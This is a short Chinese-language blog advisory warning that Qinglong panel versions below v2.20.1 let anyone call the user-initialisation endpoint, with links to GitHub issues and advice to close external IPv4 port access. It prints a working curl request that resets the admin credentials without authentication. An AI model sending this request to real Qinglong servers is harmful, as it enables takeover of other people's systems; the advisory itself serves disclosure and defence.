青龙存在嚴重漏洞

青龙存在嚴重漏洞，影響到所有版本（v2.20.1 以下）

相關漏洞報告：

https://github.com/whyour/qinglong/issues/2923
https://github.com/whyour/qinglong/issues/2933
https://github.com/whyour/qinglong/issues/2934

初始化用戶接口可以被任意調用，具體請求如下：

curl -X PUT 'http://10.10.10.123:5700/open/user/init' -H 'Content-Type: application/json' -d '{
  "username": "admin",
  "password": "adminadmin"
}'

一些話

1. 如果你對外用的是ipv6，問題不大，一般掃不到
2. 如果你對外用的是ipv4，建議直接關閉外網端口訪問

---

版權屬於：zgcwkj

本文鏈接：https://www.zgcwkj.com/archives/272.html

轉載聲明：請注明本文章的標題及內容的出處和聲明，謝謝